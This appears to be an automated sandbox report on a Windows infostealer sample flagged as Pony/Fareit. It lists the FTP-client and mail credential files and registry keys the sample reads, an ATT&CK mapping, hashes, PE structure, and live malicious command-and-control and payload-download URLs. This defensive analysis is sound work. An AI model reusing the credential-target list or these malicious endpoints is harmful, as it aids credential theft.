Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\BlazeFtp\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\FTPGetter\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\AceBIT\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Windows\32BitFtp.ini	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\3D-FTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Frigate3\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\NetSarang\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\FTPRush\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: HKEY_LOCAL_MACHINE\Software\TurboFTP	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Windows\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.dat	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword		1_2_0040E9CE
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword		1_2_0040E9CE

Remote Access Functionality

Yara detected Pony

Source: Yara match	File source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Valid Accounts	1 Valid Accounts	2 Obfuscated Files or Information	2 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Access Token Manipulation	1 Install Root Certificate	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	211 Process Injection	1 DLL Side-Loading	NTDS	15 System Information Discovery	Distributed Component Object Model	Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Valid Accounts	LSA Secrets	21 Security Software Discovery	SSH	Keylogging	111 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Access Token Manipulation	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	211 Process Injection	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
a5gvJhukP7.exe	89%	ReversingLabs	Win32.Infostealer.Zeus
a5gvJhukP7.exe	100%	Avira	TR/PSW.Fareit.E.390
a5gvJhukP7.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Name	Malicious	Reputation
http://tokulances.sitebr.net/jV1.exe	true	unknown
http://67.215.225.205:8080/forum/viewtopic.php	true	unknown
http://ftp.approachit.com/jZy.exe	true	unknown
http://atualizacoes.issqn.net/FhPD.exe	true	unknown
http://67.215.225.205/forum/viewtopic.php	true	unknown
http://209.59.219.70/forum/viewtopic.php	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://https://ftp://operawand.dat_Software	a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp	false		unknown
ftp://http://https://ftp.fireFTPsites.datSeaMonkey	a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://www.ibsensoftware.com/	a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://67.215.225.205:8080/forum/viewtopic.phpcv	a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://67.215.225.205:8080/forum/viewtopic.phphttp://209.59.219.70/forum/viewtopic.phphttp://ftp.app	a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
67.215.225.205	unknown	United States		8100	ASN-QUADRANET-GLOBALUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528458
Start date and time:	2024-10-07 23:11:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	a5gvJhukP7.exe renamed because original name is a hash value
Original Sample Name:	18579d8151a242cf2e9b69b016479481.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 92 Number of non-executed functions: 56
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: a5gvJhukP7.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
67.215.225.205	HzqSbpExZl.exe	Get hash	malicious	Pony	Browse	67.215.225.205/forum/viewtopic.php
	YqgmaN12W1.exe	Get hash	malicious	Pony	Browse	67.215.225.205/forum/viewtopic.php
	3t5zTQdNnv.exe	Get hash	malicious	Pony	Browse	67.215.225.205/forum/viewtopic.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASN-QUADRANET-GLOBALUS	PAYMENT SPECIFIKACIJA 364846637-pdf.vbs	Get hash	malicious	Remcos	Browse	64.188.16.157
	REQUEST FOR QUOTE-INQUIRY#87278.SAMPLE AND PRODUCTS.exe	Get hash	malicious	AsyncRAT, StormKitty, VenomRAT	Browse	72.11.142.133
	na.elf	Get hash	malicious	Mirai	Browse	45.199.228.213
	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse	104.223.122.15
	ae#U03c2.doc	Get hash	malicious	Unknown	Browse	66.63.187.123
	SWIFT 103 202406111301435660 110624-pdf.vbs	Get hash	malicious	Remcos	Browse	64.188.16.157
	1728033125dd387fed0490e7ade394383eca6a3c5cb1fd0e94f8067e03fabd8e0d741cea5c331.dat-decoded.exe	Get hash	malicious	Remcos	Browse	64.188.16.157
	PDFDQ_P01_303B9367_2024-10-03_185650.vbs	Get hash	malicious	Remcos	Browse	64.188.16.157
	rpedido-002297.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.223.44.195
	PO906-645S790768.xlam.xlsx	Get hash	malicious	Unknown	Browse	66.63.187.171

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.6022047417340755
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	a5gvJhukP7.exe
File size:	135'168 bytes
MD5:	18579d8151a242cf2e9b69b016479481
SHA1:	051bd937961bad91c2a3074eb39c001e591758d6
SHA256:	2371d8edbb2a1245b01cc06a870ddca49acb3be47b25e0fddc5d1b0032780bdf
SHA512:	ec21b41a643ea5726a8b790bd16a048c79560eefe993578877d093784c2b75fa5d1176e7eddf25451ad935b720da79e0ae4697da4047d652f1e18a85cf7b7c3d
SSDEEP:	3072:DfbmUkNmOJswwbO6Bmz9QKtOMGDjg3KxnP:jb/k7CZB29IMiU3W
TLSH:	D4D3E011E6D79472D063013824B592658F7E7C825F7067CB7B883A6FAFB26C08C68797
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u.2.1.\[1.\[1.\[^..[;.\[^..[9.\[^..[..\[8..[4.\[1.][t.\[^..[3.\[^..[0.\[^..[0.\[Rich1.\[........PE..L....Y4P.................X.

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40243f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x503459D4 [Wed Aug 22 04:02:28 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	67f41b89aedf5cc2e7fae6e5e979d124

Entrypoint Preview

Instruction
call 00007FA9B567F2E0h
jmp 00007FA9B567DC8Eh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00409C38h], eax
mov dword ptr [00409C34h], ecx
mov dword ptr [00409C30h], edx
mov dword ptr [00409C2Ch], ebx
mov dword ptr [00409C28h], esi
mov dword ptr [00409C24h], edi
mov word ptr [00409C50h], ss
mov word ptr [00409C44h], cs
mov word ptr [00409C20h], ds
mov word ptr [00409C1Ch], es
mov word ptr [00409C18h], fs
mov word ptr [00409C14h], gs
pushfd
pop dword ptr [00409C48h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00409C3Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00409C40h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00409C4Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00409B88h], 00010001h
mov eax, dword ptr [00409C40h]
mov dword ptr [00409B3Ch], eax
mov dword ptr [00409B30h], C0000409h
mov dword ptr [00409B34h], 00000001h
mov eax, dword ptr [00409004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00409008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [00000048h]

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24000	0xc00	.zdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb000	0x170c4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x23000	0x668	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x8818	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5672	0x5800	b7d52c13b6f840ea2593e85c1ce03704	False	0.5963245738636364	data	6.474877855071261	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x7000	0x1fd2	0x2000	41204d0cb7f3c3c462a393f2f8bfd78c	False	0.33544921875	data	4.750773777834433	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data	0x9000	0x1900	0xc00	b1d6e5847dbb32b0b9cea7f58cb27373	False	0.2138671875	Matlab v4 mat-file (little endian) \200, sparse, rows 3141592654, columns 1153374641	2.446636984620169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xb000	0x170c4	0x17200	f1b49f943908eca2f90a13c730a68249	False	0.9819362331081081	data	7.976039467152603	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x23000	0x828	0xa00	af94803f0b1f93ff6fb62d63afdd880d	False	0.569140625	data	5.0114865128132395	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.zdata	0x24000	0x1000	0xc00	5e046ad3323cd2e81b3cdc42fba7f3a3	False	0.3232421875	data	4.4654152489392525	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xb268	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0xb39c	0x134	AmigaOS bitmap font "(", fc_YSize 4294966787, 3840 elements, 2nd "\377\003\300\377\377\200\001\377\377\300\003\377\377\340\007\377\377\370\037\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	English	United States	0.5584415584415584
RT_CURSOR	0xb4d0	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.43506493506493504
RT_DIALOG	0xb604	0x16600	data	English	United States	1.0003928072625698
RT_DIALOG	0x21c04	0xb0	data	English	United States	0.6818181818181818
RT_GROUP_CURSOR	0x21cb4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x21cc8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x21cdc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_VERSION	0x21cf0	0x278	data			0.4620253164556962
RT_MANIFEST	0x21f68	0x15a	ASCII text, with CRLF line terminators	English	United States	0.5491329479768786

Imports

DLL	Import
KERNEL32.dll	HeapAlloc, Sleep, HeapFree, ExitProcess, GetVersionExA, HeapReAlloc, GetStringTypeW, MultiByteToWideChar, LCMapStringW, HeapSize, RtlUnwind, GetCommandLineA, HeapSetInformation, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetProcAddress, GetModuleHandleW, DecodePointer, WriteFile, GetStdHandle, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, EnterCriticalSection, LoadLibraryW, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, IsProcessorFeaturePresent
USER32.dll	SendDlgItemMessageA, EndDialog, MessageBoxExA, MessageBoxIndirectA, SystemParametersInfoA
